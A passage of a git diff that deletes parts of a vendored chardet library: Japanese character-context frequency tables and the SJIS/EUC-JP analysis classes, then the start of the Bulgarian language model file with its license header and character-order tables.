-(0,2,0,1,0,3,1,3,0,2,3,3,3,0,3,1,0,0,3,0,3,2,3,1,3,2,1,1,0,0,4,2,1,0,2,3,1,4,3,2,0,4,4,3,1,3,1,3,0,1,0,0,1,0,0,0,1,0,0,0,0,4,1,1,1,2,0,3,0,0,0,3,4,2,4,3,2,0,1,0,0,3,3), -(0,1,0,4,0,5,0,4,0,2,4,4,2,3,3,2,3,3,5,3,3,3,4,3,4,2,3,0,4,3,3,3,4,1,4,3,2,1,5,5,3,4,5,1,3,5,4,2,0,3,3,0,1,3,0,4,2,0,1,3,1,4,3,3,3,3,0,3,0,1,0,3,4,4,4,5,5,0,3,0,1,4,5), -(0,2,0,3,0,3,0,0,0,2,3,1,3,0,4,0,1,1,3,0,3,4,3,2,3,1,0,3,3,2,3,1,3,0,2,3,0,2,1,4,1,2,2,0,0,3,3,0,0,2,0,0,0,1,0,0,0,0,2,2,0,3,2,1,3,3,0,2,0,2,0,0,3,3,1,2,4,0,3,0,2,2,3), -(2,4,0,5,0,4,0,4,0,2,4,4,4,3,4,3,3,3,1,2,4,3,4,3,4,4,5,0,3,3,3,3,2,0,4,3,1,4,3,4,1,4,4,3,3,4,4,3,1,2,3,0,4,2,0,4,1,0,3,3,0,4,3,3,3,4,0,4,0,2,0,3,5,3,4,5,2,0,3,0,0,4,5), -(0,3,0,4,0,1,0,1,0,1,3,2,2,1,3,0,3,0,2,0,2,0,3,0,2,0,0,0,1,0,1,1,0,0,3,1,0,0,0,4,0,3,1,0,2,1,3,0,0,0,0,0,0,3,0,0,0,0,0,0,0,4,2,2,3,1,0,3,0,0,0,1,4,4,4,3,0,0,4,0,0,1,4), -(1,4,1,5,0,3,0,3,0,4,5,4,4,3,5,3,3,4,4,3,4,1,3,3,3,3,2,1,4,1,5,4,3,1,4,4,3,5,4,4,3,5,4,3,3,4,4,4,0,3,3,1,2,3,0,3,1,0,3,3,0,5,4,4,4,4,4,4,3,3,5,4,4,3,3,5,4,0,3,2,0,4,4), -(0,2,0,3,0,1,0,0,0,1,3,3,3,2,4,1,3,0,3,1,3,0,2,2,1,1,0,0,2,0,4,3,1,0,4,3,0,4,4,4,1,4,3,1,1,3,3,1,0,2,0,0,1,3,0,0,0,0,2,0,0,4,3,2,4,3,5,4,3,3,3,4,3,3,4,3,3,0,2,1,0,3,3), -(0,2,0,4,0,3,0,2,0,2,5,5,3,4,4,4,4,1,4,3,3,0,4,3,4,3,1,3,3,2,4,3,0,3,4,3,0,3,4,4,2,4,4,0,4,5,3,3,2,2,1,1,1,2,0,1,5,0,3,3,2,4,3,3,3,4,0,3,0,2,0,4,4,3,5,5,0,0,3,0,2,3,3), -(0,3,0,4,0,3,0,1,0,3,4,3,3,1,3,3,3,0,3,1,3,0,4,3,3,1,1,0,3,0,3,3,0,0,4,4,0,1,5,4,3,3,5,0,3,3,4,3,0,2,0,1,1,1,0,1,3,0,1,2,1,3,3,2,3,3,0,3,0,1,0,1,3,3,4,4,1,0,1,2,2,1,3), -(0,1,0,4,0,4,0,3,0,1,3,3,3,2,3,1,1,0,3,0,3,3,4,3,2,4,2,0,1,0,4,3,2,0,4,3,0,5,3,3,2,4,4,4,3,3,3,4,0,1,3,0,0,1,0,0,1,0,0,0,0,4,2,3,3,3,0,3,0,0,0,4,4,4,5,3,2,0,3,3,0,3,5), -(0,2,0,3,0,0,0,3,0,1,3,0,2,0,0,0,1,0,3,1,1,3,3,0,0,3,0,0,3,0,2,3,1,0,3,1,0,3,3,2,0,4,2,2,0,2,0,0,0,4,0,0,0,0,0,0,0,0,0,0,0,2,1,2,0,1,0,1,0,0,0,1,3,1,2,0,0,0,1,0,0,1,4), -(0,3,0,3,0,5,0,1,0,2,4,3,1,3,3,2,1,1,5,2,1,0,5,1,2,0,0,0,3,3,2,2,3,2,4,3,0,0,3,3,1,3,3,0,2,5,3,4,0,3,3,0,1,2,0,2,2,0,3,2,0,2,2,3,3,3,0,2,0,1,0,3,4,4,2,5,4,0,3,0,0,3,5), -(0,3,0,3,0,3,0,1,0,3,3,3,3,0,3,0,2,0,2,1,1,0,2,0,1,0,0,0,2,1,0,0,1,0,3,2,0,0,3,3,1,2,3,1,0,3,3,0,0,1,0,0,0,0,0,2,0,0,0,0,0,2,3,1,2,3,0,3,0,1,0,3,2,1,0,4,3,0,1,1,0,3,3), -(0,4,0,5,0,3,0,3,0,4,5,5,4,3,5,3,4,3,5,3,3,2,5,3,4,4,4,3,4,3,4,5,5,3,4,4,3,4,4,5,4,4,4,3,4,5,5,4,2,3,4,2,3,4,0,3,3,1,4,3,2,4,3,3,5,5,0,3,0,3,0,5,5,5,5,4,4,0,4,0,1,4,4), -(0,4,0,4,0,3,0,3,0,3,5,4,4,2,3,2,5,1,3,2,5,1,4,2,3,2,3,3,4,3,3,3,3,2,5,4,1,3,3,5,3,4,4,0,4,4,3,1,1,3,1,0,2,3,0,2,3,0,3,0,0,4,3,1,3,4,0,3,0,2,0,4,4,4,3,4,5,0,4,0,0,3,4), -(0,3,0,3,0,3,1,2,0,3,4,4,3,3,3,0,2,2,4,3,3,1,3,3,3,1,1,0,3,1,4,3,2,3,4,4,2,4,4,4,3,4,4,3,2,4,4,3,1,3,3,1,3,3,0,4,1,0,2,2,1,4,3,2,3,3,5,4,3,3,5,4,4,3,3,0,4,0,3,2,2,4,4), -(0,2,0,1,0,0,0,0,0,1,2,1,3,0,0,0,0,0,2,0,1,2,1,0,0,1,0,0,0,0,3,0,0,1,0,1,1,3,1,0,0,0,1,1,0,1,1,0,0,0,0,0,2,0,0,0,0,0,0,0,0,1,1,2,2,0,3,4,0,0,0,1,1,0,0,1,0,0,0,0,0,1,1), -(0,1,0,0,0,1,0,0,0,0,4,0,4,1,4,0,3,0,4,0,3,0,4,0,3,0,3,0,4,1,5,1,4,0,0,3,0,5,0,5,2,0,1,0,0,0,2,1,4,0,1,3,0,0,3,0,0,3,1,1,4,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0), -(1,4,0,5,0,3,0,2,0,3,5,4,4,3,4,3,5,3,4,3,3,0,4,3,3,3,3,3,3,2,4,4,3,1,3,4,4,5,4,4,3,4,4,1,3,5,4,3,3,3,1,2,2,3,3,1,3,1,3,3,3,5,3,3,4,5,0,3,0,3,0,3,4,3,4,4,3,0,3,0,2,4,3), -(0,1,0,4,0,0,0,0,0,1,4,0,4,1,4,2,4,0,3,0,1,0,1,0,0,0,0,0,2,0,3,1,1,1,0,3,0,0,0,1,2,1,0,0,1,1,1,1,0,1,0,0,0,1,0,0,3,0,0,0,0,3,2,0,2,2,0,1,0,0,0,2,3,2,3,3,0,0,0,0,2,1,0), -(0,5,1,5,0,3,0,3,0,5,4,4,5,1,5,3,3,0,4,3,4,3,5,3,4,3,3,2,4,3,4,3,3,0,3,3,1,4,4,3,4,4,4,3,4,5,5,3,2,3,1,1,3,3,1,3,1,1,3,3,2,4,5,3,3,5,0,4,0,3,0,4,4,3,5,3,3,0,3,4,0,4,3), -(0,5,0,5,0,3,0,2,0,4,4,3,5,2,4,3,3,3,4,4,4,3,5,3,5,3,3,1,4,0,4,3,3,0,3,3,0,4,4,4,4,5,4,3,3,5,5,3,2,3,1,2,3,2,0,1,0,0,3,2,2,4,4,3,1,5,0,4,0,3,0,4,3,1,3,2,1,0,3,3,0,3,3), -(0,4,0,5,0,5,0,4,0,4,5,5,5,3,4,3,3,2,5,4,4,3,5,3,5,3,4,0,4,3,4,4,3,2,4,4,3,4,5,4,4,5,5,0,3,5,5,4,1,3,3,2,3,3,1,3,1,0,4,3,1,4,4,3,4,5,0,4,0,2,0,4,3,4,4,3,3,0,4,0,0,5,5), -(0,4,0,4,0,5,0,1,1,3,3,4,4,3,4,1,3,0,5,1,3,0,3,1,3,1,1,0,3,0,3,3,4,0,4,3,0,4,4,4,3,4,4,0,3,5,4,1,0,3,0,0,2,3,0,3,1,0,3,1,0,3,2,1,3,5,0,3,0,1,0,3,2,3,3,4,4,0,2,2,0,4,4), -(2,4,0,5,0,4,0,3,0,4,5,5,4,3,5,3,5,3,5,3,5,2,5,3,4,3,3,4,3,4,5,3,2,1,5,4,3,2,3,4,5,3,4,1,2,5,4,3,0,3,3,0,3,2,0,2,3,0,4,1,0,3,4,3,3,5,0,3,0,1,0,4,5,5,5,4,3,0,4,2,0,3,5), -(0,5,0,4,0,4,0,2,0,5,4,3,4,3,4,3,3,3,4,3,4,2,5,3,5,3,4,1,4,3,4,4,4,0,3,5,0,4,4,4,4,5,3,1,3,4,5,3,3,3,3,3,3,3,0,2,2,0,3,3,2,4,3,3,3,5,3,4,1,3,3,5,3,2,0,0,0,0,4,3,1,3,3), -(0,1,0,3,0,3,0,1,0,1,3,3,3,2,3,3,3,0,3,0,0,0,3,1,3,0,0,0,2,2,2,3,0,0,3,2,0,1,2,4,1,3,3,0,0,3,3,3,0,1,0,0,2,1,0,0,3,0,3,1,0,3,0,0,1,3,0,2,0,1,0,3,3,1,3,3,0,0,1,1,0,3,3), -(0,2,0,3,0,2,1,4,0,2,2,3,1,1,3,1,1,0,2,0,3,1,2,3,1,3,0,0,1,0,4,3,2,3,3,3,1,4,2,3,3,3,3,1,0,3,1,4,0,1,1,0,1,2,0,1,1,0,1,1,0,3,1,3,2,2,0,1,0,0,0,2,3,3,3,1,0,0,0,0,0,2,3), -(0,5,0,4,0,5,0,2,0,4,5,5,3,3,4,3,3,1,5,4,4,2,4,4,4,3,4,2,4,3,5,5,4,3,3,4,3,3,5,5,4,5,5,1,3,4,5,3,1,4,3,1,3,3,0,3,3,1,4,3,1,4,5,3,3,5,0,4,0,3,0,5,3,3,1,4,3,0,4,0,1,5,3), -(0,5,0,5,0,4,0,2,0,4,4,3,4,3,3,3,3,3,5,4,4,4,4,4,4,5,3,3,5,2,4,4,4,3,4,4,3,3,4,4,5,5,3,3,4,3,4,3,3,4,3,3,3,3,1,2,2,1,4,3,3,5,4,4,3,4,0,4,0,3,0,4,4,4,4,4,1,0,4,2,0,2,4), -(0,4,0,4,0,3,0,1,0,3,5,2,3,0,3,0,2,1,4,2,3,3,4,1,4,3,3,2,4,1,3,3,3,0,3,3,0,0,3,3,3,5,3,3,3,3,3,2,0,2,0,0,2,0,0,2,0,0,1,0,0,3,1,2,2,3,0,3,0,2,0,4,4,3,3,4,1,0,3,0,0,2,4), -(0,0,0,4,0,0,0,0,0,0,1,0,1,0,2,0,0,0,0,0,1,0,2,0,1,0,0,0,0,0,3,1,3,0,3,2,0,0,0,1,0,3,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,4,0,2,0,0,0,0,0,0,2), -(0,2,1,3,0,2,0,2,0,3,3,3,3,1,3,1,3,3,3,3,3,3,4,2,2,1,2,1,4,0,4,3,1,3,3,3,2,4,3,5,4,3,3,3,3,3,3,3,0,1,3,0,2,0,0,1,0,0,1,0,0,4,2,0,2,3,0,3,3,0,3,3,4,2,3,1,4,0,1,2,0,2,3), -(0,3,0,3,0,1,0,3,0,2,3,3,3,0,3,1,2,0,3,3,2,3,3,2,3,2,3,1,3,0,4,3,2,0,3,3,1,4,3,3,2,3,4,3,1,3,3,1,1,0,1,1,0,1,0,1,0,1,0,0,0,4,1,1,0,3,0,3,1,0,2,3,3,3,3,3,1,0,0,2,0,3,3), -(0,0,0,0,0,0,0,0,0,0,3,0,2,0,3,0,0,0,0,0,0,0,3,0,0,0,0,0,0,0,3,0,3,0,3,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,2,0,2,3,0,0,0,0,0,0,0,0,3), -(0,2,0,3,1,3,0,3,0,2,3,3,3,1,3,1,3,1,3,1,3,3,3,1,3,0,2,3,1,1,4,3,3,2,3,3,1,2,2,4,1,3,3,0,1,4,2,3,0,1,3,0,3,0,0,1,3,0,2,0,0,3,3,2,1,3,0,3,0,2,0,3,4,4,4,3,1,0,3,0,0,3,3), -(0,2,0,1,0,2,0,0,0,1,3,2,2,1,3,0,1,1,3,0,3,2,3,1,2,0,2,0,1,1,3,3,3,0,3,3,1,1,2,3,2,3,3,1,2,3,2,0,0,1,0,0,0,0,0,0,3,0,1,0,0,2,1,2,1,3,0,3,0,0,0,3,4,4,4,3,2,0,2,0,0,2,4), -(0,0,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,2,2,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,1,3,1,0,0,0,0,0,0,0,3), -(0,3,0,3,0,2,0,3,0,3,3,3,2,3,2,2,2,0,3,1,3,3,3,2,3,3,0,0,3,0,3,2,2,0,2,3,1,4,3,4,3,3,2,3,1,5,4,4,0,3,1,2,1,3,0,3,1,1,2,0,2,3,1,3,1,3,0,3,0,1,0,3,3,4,4,2,1,0,2,1,0,2,4), -(0,1,0,3,0,1,0,2,0,1,4,2,5,1,4,0,2,0,2,1,3,1,4,0,2,1,0,0,2,1,4,1,1,0,3,3,0,5,1,3,2,3,3,1,0,3,2,3,0,1,0,0,0,0,0,0,1,0,0,0,0,4,0,1,0,3,0,2,0,1,0,3,3,3,4,3,3,0,0,0,0,2,3), -(0,0,0,1,0,0,0,0,0,0,2,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,1,0,0,1,0,0,0,0,0,3), -(0,1,0,3,0,4,0,3,0,2,4,3,1,0,3,2,2,1,3,1,2,2,3,1,1,1,2,1,3,0,1,2,0,1,3,2,1,3,0,5,5,1,0,0,1,3,2,1,0,3,0,0,1,0,0,0,0,0,3,4,0,1,1,1,3,2,0,2,0,1,0,2,3,3,1,2,3,0,1,0,1,0,4), -(0,0,0,1,0,3,0,3,0,2,2,1,0,0,4,0,3,0,3,1,3,0,3,0,3,0,1,0,3,0,3,1,3,0,3,3,0,0,1,2,1,1,1,0,1,2,0,0,0,1,0,0,1,0,0,0,0,0,0,0,0,2,2,1,2,0,0,2,0,0,0,0,2,3,3,3,3,0,0,0,0,1,4), -(0,0,0,3,0,3,0,0,0,0,3,1,1,0,3,0,1,0,2,0,1,0,0,0,0,0,0,0,1,0,3,0,2,0,2,3,0,0,2,2,3,1,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,2,0,0,0,0,2,3), -(2,4,0,5,0,5,0,4,0,3,4,3,3,3,4,3,3,3,4,3,4,4,5,4,5,5,5,2,3,0,5,5,4,1,5,4,3,1,5,4,3,4,4,3,3,4,3,3,0,3,2,0,2,3,0,3,0,0,3,3,0,5,3,2,3,3,0,3,0,3,0,3,4,5,4,5,3,0,4,3,0,3,4), -(0,3,0,3,0,3,0,3,0,3,3,4,3,2,3,2,3,0,4,3,3,3,3,3,3,3,3,0,3,2,4,3,3,1,3,4,3,4,4,4,3,4,4,3,2,4,4,1,0,2,0,0,1,1,0,2,0,0,3,1,0,5,3,2,1,3,0,3,0,1,2,4,3,2,4,3,3,0,3,2,0,4,4), -(0,3,0,3,0,1,0,0,0,1,4,3,3,2,3,1,3,1,4,2,3,2,4,2,3,4,3,0,2,2,3,3,3,0,3,3,3,0,3,4,1,3,3,0,3,4,3,3,0,1,1,0,1,0,0,0,4,0,3,0,0,3,1,2,1,3,0,4,0,1,0,4,3,3,4,3,3,0,2,0,0,3,3), -(0,3,0,4,0,1,0,3,0,3,4,3,3,0,3,3,3,1,3,1,3,3,4,3,3,3,0,0,3,1,5,3,3,1,3,3,2,5,4,3,3,4,5,3,2,5,3,4,0,1,0,0,0,0,0,2,0,0,1,1,0,4,2,2,1,3,0,3,0,2,0,4,4,3,5,3,2,0,1,1,0,3,4), -(0,5,0,4,0,5,0,2,0,4,4,3,3,2,3,3,3,1,4,3,4,1,5,3,4,3,4,0,4,2,4,3,4,1,5,4,0,4,4,4,4,5,4,1,3,5,4,2,1,4,1,1,3,2,0,3,1,0,3,2,1,4,3,3,3,4,0,4,0,3,0,4,4,4,3,3,3,0,4,2,0,3,4), -(1,4,0,4,0,3,0,1,0,3,3,3,1,1,3,3,2,2,3,3,1,0,3,2,2,1,2,0,3,1,2,1,2,0,3,2,0,2,2,3,3,4,3,0,3,3,1,2,0,1,1,3,1,2,0,0,3,0,1,1,0,3,2,2,3,3,0,3,0,0,0,2,3,3,4,3,3,0,1,0,0,1,4), -(0,4,0,4,0,4,0,0,0,3,4,4,3,1,4,2,3,2,3,3,3,1,4,3,4,0,3,0,4,2,3,3,2,2,5,4,2,1,3,4,3,4,3,1,3,3,4,2,0,2,1,0,3,3,0,0,2,0,3,1,0,4,4,3,4,3,0,4,0,1,0,2,4,4,4,4,4,0,3,2,0,3,3), -(0,0,0,1,0,4,0,0,0,0,0,0,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,3,2,0,0,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,2), -(0,2,0,3,0,4,0,4,0,1,3,3,3,0,4,0,2,1,2,1,1,1,2,0,3,1,1,0,1,0,3,1,0,0,3,3,2,0,1,1,0,0,0,0,0,1,0,2,0,2,2,0,3,1,0,0,1,0,1,1,0,1,2,0,3,0,0,0,0,1,0,0,3,3,4,3,1,0,1,0,3,0,2), -(0,0,0,3,0,5,0,0,0,0,1,0,2,0,3,1,0,1,3,0,0,0,2,0,0,0,1,0,0,0,1,1,0,0,4,0,0,0,2,3,0,1,4,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,0,0,0,0,1,0,0,0,0,0,0,0,2,0,0,3,0,0,0,0,0,3), -(0,2,0,5,0,5,0,1,0,2,4,3,3,2,5,1,3,2,3,3,3,0,4,1,2,0,3,0,4,0,2,2,1,1,5,3,0,0,1,4,2,3,2,0,3,3,3,2,0,2,4,1,1,2,0,1,1,0,3,1,0,1,3,1,2,3,0,2,0,0,0,1,3,5,4,4,4,0,3,0,0,1,3), -(0,4,0,5,0,4,0,4,0,4,5,4,3,3,4,3,3,3,4,3,4,4,5,3,4,5,4,2,4,2,3,4,3,1,4,4,1,3,5,4,4,5,5,4,4,5,5,5,2,3,3,1,4,3,1,3,3,0,3,3,1,4,3,4,4,4,0,3,0,4,0,3,3,4,4,5,0,0,4,3,0,4,5), -(0,4,0,4,0,3,0,3,0,3,4,4,4,3,3,2,4,3,4,3,4,3,5,3,4,3,2,1,4,2,4,4,3,1,3,4,2,4,5,5,3,4,5,4,1,5,4,3,0,3,2,2,3,2,1,3,1,0,3,3,3,5,3,3,3,5,4,4,2,3,3,4,3,3,3,2,1,0,3,2,1,4,3), -(0,4,0,5,0,4,0,3,0,3,5,5,3,2,4,3,4,0,5,4,4,1,4,4,4,3,3,3,4,3,5,5,2,3,3,4,1,2,5,5,3,5,5,2,3,5,5,4,0,3,2,0,3,3,1,1,5,1,4,1,0,4,3,2,3,5,0,4,0,3,0,5,4,3,4,3,0,0,4,1,0,4,4), -(1,3,0,4,0,2,0,2,0,2,5,5,3,3,3,3,3,0,4,2,3,4,4,4,3,4,0,0,3,4,5,4,3,3,3,3,2,5,5,4,5,5,5,4,3,5,5,5,1,3,1,0,1,0,0,3,2,0,4,2,0,5,2,3,2,4,1,3,0,3,0,4,5,4,5,4,3,0,4,2,0,5,4), -(0,3,0,4,0,5,0,3,0,3,4,4,3,2,3,2,3,3,3,3,3,2,4,3,3,2,2,0,3,3,3,3,3,1,3,3,3,0,4,4,3,4,4,1,1,4,4,2,0,3,1,0,1,1,0,4,1,0,2,3,1,3,3,1,3,4,0,3,0,1,0,3,1,3,0,0,1,0,2,0,0,4,4), -(0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0), -(0,3,0,3,0,2,0,3,0,1,5,4,3,3,3,1,4,2,1,2,3,4,4,2,4,4,5,0,3,1,4,3,4,0,4,3,3,3,2,3,2,5,3,4,3,2,2,3,0,0,3,0,2,1,0,1,2,0,0,0,0,2,1,1,3,1,0,2,0,4,0,3,4,4,4,5,2,0,2,0,0,1,3), -(0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,1,1,1,0,0,1,1,0,0,0,4,2,1,1,0,1,0,3,2,0,0,3,1,1,1,2,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,3,0,1,0,0,0,2,0,0,0,1,4,0,4,2,1,0,0,0,0,0,1), -(0,0,0,0,0,0,0,0,0,1,0,1,0,0,0,0,1,0,0,0,0,0,0,1,0,1,0,0,0,0,3,1,0,0,0,2,0,2,1,0,0,1,2,1,0,1,1,0,0,3,0,0,0,0,0,0,0,0,0,0,0,1,3,1,0,0,0,0,0,1,0,0,2,1,0,0,0,0,0,0,0,0,2), -(0,4,0,4,0,4,0,3,0,4,4,3,4,2,4,3,2,0,4,4,4,3,5,3,5,3,3,2,4,2,4,3,4,3,1,4,0,2,3,4,4,4,3,3,3,4,4,4,3,4,1,3,4,3,2,1,2,1,3,3,3,4,4,3,3,5,0,4,0,3,0,4,3,3,3,2,1,0,3,0,0,3,3), -(0,4,0,3,0,3,0,3,0,3,5,5,3,3,3,3,4,3,4,3,3,3,4,4,4,3,3,3,3,4,3,5,3,3,1,3,2,4,5,5,5,5,4,3,4,5,5,3,2,2,3,3,3,3,2,3,3,1,2,3,2,4,3,3,3,4,0,4,0,2,0,4,3,2,2,1,2,0,3,0,0,4,1), -) - -class JapaneseContextAnalysis: - def __init__(self): - self.reset() - - def reset(self): - self._mTotalRel = 0 # total sequence received - self._mRelSample = [0] * NUM_OF_CATEGORY # category counters, each interger counts sequence in its category - self._mNeedToSkipCharNum = 0 # if last byte in current buffer is not the last byte of a character, we need to know how many bytes to skip in next buffer - self._mLastCharOrder = -1 # The order of previous char - self._mDone = constants.False # If this flag is set to constants.True, detection is done and conclusion has been made - - def feed(self, aBuf, aLen): - if self._mDone: return - - # The buffer we got is byte oriented, and a character may span in more than one - # buffers. In case the last one or two byte in last buffer is not complete, we - # record how many byte needed to complete that character and skip these bytes here. - # We can choose to record those bytes as well and analyse the character once it - # is complete, but since a character will not make much difference, by simply skipping - # this character will simply our logic and improve performance. - i = self._mNeedToSkipCharNum - while i < aLen: - order, charLen = self.get_order(aBuf[i:i+2]) - i += charLen - if i > aLen: - self._mNeedToSkipCharNum = i - aLen - self._mLastCharOrder = -1 - else: - if (order != -1) and (self._mLastCharOrder != -1): - self._mTotalRel += 1 - if self._mTotalRel > MAX_REL_THRESHOLD: - self._mDone = constants.True - break - self._mRelSample[jp2CharContext[self._mLastCharOrder][order]] += 1 - self._mLastCharOrder = order - - def got_enough_data(self): - return self._mTotalRel > ENOUGH_REL_THRESHOLD - - def get_confidence(self): - # This is just one way to calculate confidence. It works well for me. - if self._mTotalRel > MINIMUM_DATA_THRESHOLD: - return (self._mTotalRel - self._mRelSample[0]) / self._mTotalRel - else: - return DONT_KNOW - - def get_order(self, aStr): - return -1, 1 - -class SJISContextAnalysis(JapaneseContextAnalysis): - def get_order(self, aStr): - if not aStr: return -1, 1 - # find out current char's byte length - if ((aStr[0] >= '\x81') and (aStr[0] <= '\x9F')) or \ - ((aStr[0] >= '\xE0') and (aStr[0] <= '\xFC')): - charLen = 2 - else: - charLen = 1 - - # return its order if it is hiragana - if len(aStr) > 1: - if (aStr[0] == '\202') and \ - (aStr[1] >= '\x9F') and \ - (aStr[1] <= '\xF1'): - return ord(aStr[1]) - 0x9F, charLen - - return -1, charLen - -class EUCJPContextAnalysis(JapaneseContextAnalysis): - def get_order(self, aStr): - if not aStr: return -1, 1 - # find out current char's byte length - if (aStr[0] == '\x8E') or \ - ((aStr[0] >= '\xA1') and (aStr[0] <= '\xFE')): - charLen = 2 - elif aStr[0] == '\x8F': - charLen = 3 - else: - charLen = 1 - - # return its order if it is hiragana - if len(aStr) > 1: - if (aStr[0] == '\xA4') and \ - (aStr[1] >= '\xA1') and \ - (aStr[1] <= '\xF3'): - return ord(aStr[1]) - 0xA1, charLen - - return -1, charLen diff --git a/chardet/chardet/jpcntx.pyc b/chardet/chardet/jpcntx.pyc deleted file mode 100644 index 455f6e8..0000000 Binary files a/chardet/chardet/jpcntx.pyc and /dev/null differ diff --git a/chardet/chardet/langbulgarianmodel.py b/chardet/chardet/langbulgarianmodel.py deleted file mode 100644 index c6c3c95..0000000 --- a/chardet/chardet/langbulgarianmodel.py +++ /dev/null @@ -1,228 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -from . import constants - -# 255: Control characters that usually does not exist in any text -# 254: Carriage/Return -# 253: symbol (punctuation) that does not belong to word -# 252: 0 - 9 - -# Character Mapping Table: -# this table is modified base on win1251BulgarianCharToOrderMap, so -# only number <64 is sure valid - -Latin5_BulgarianCharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40 -110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50 -253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60 -116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70 -194,195,196,197,198,199,200,201,202,203,204,205,206,207,208,209, # 80 -210,211,212,213,214,215,216,217,218,219,220,221,222,223,224,225, # 90 - 81,226,227,228,229,230,105,231,232,233,234,235,236, 45,237,238, # a0 - 31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # b0 - 39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,239, 67,240, 60, 56, # c0 - 1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # d0 - 7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,241, 42, 16, # e0 - 62,242,243,244, 58,245, 98,246,247,248,249,250,251, 91,252,253, # f0 -) - -win1251BulgarianCharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253, 77, 90, 99,100, 72,109,107,101, 79,185, 81,102, 76, 94, 82, # 40 -110,186,108, 91, 74,119, 84, 96,111,187,115,253,253,253,253,253, # 50 -253, 65, 69, 70, 66, 63, 68,112,103, 92,194,104, 95, 86, 87, 71, # 60 -116,195, 85, 93, 97,113,196,197,198,199,200,253,253,253,253,253, # 70 -206,207,208,209,210,211,212,213,120,214,215,216,217,218,219,220, # 80 -221, 78, 64, 83,121, 98,117,105,222,223,224,225,226,227,228,229, # 90 - 88,230,231,232,233,122, 89,106,234,235,236,237,238, 45,239,240, # a0 - 73, 80,118,114,241,242,243,244,245, 62, 58,246,247,248,249,250, # b0 - 31, 32, 35, 43, 37, 44, 55, 47, 40, 59, 33, 46, 38, 36, 41, 30, # c0 - 39, 28, 34, 51, 48, 49, 53, 50, 54, 57, 61,251, 67,252, 60, 56, # d0 - 1, 18, 9, 20, 11, 3, 23, 15, 2, 26, 12, 10, 14, 6, 4, 13, # e0 - 7, 8, 5, 19, 29, 25, 22, 21, 27, 24, 17, 75, 52,253, 42, 16, # f0 -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 96.9392% -# first 1024 sequences:3.0618% -# rest sequences: 0.2992% -# negative sequences: 0.0020% -BulgarianLangModel = ( \ -0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,3,3,3,3,3,3,2,3,3,3,3,3, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,2,2,3,2,2,1,2,2, -3,1,3,3,2,3,3,3,3,3,3,3,3,3,3,3,3,0,3,3,3,3,3,3,3,3,3,3,0,3,0,1, -0,0,0,0,0,0,0,0,0,0,1,0,1,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, 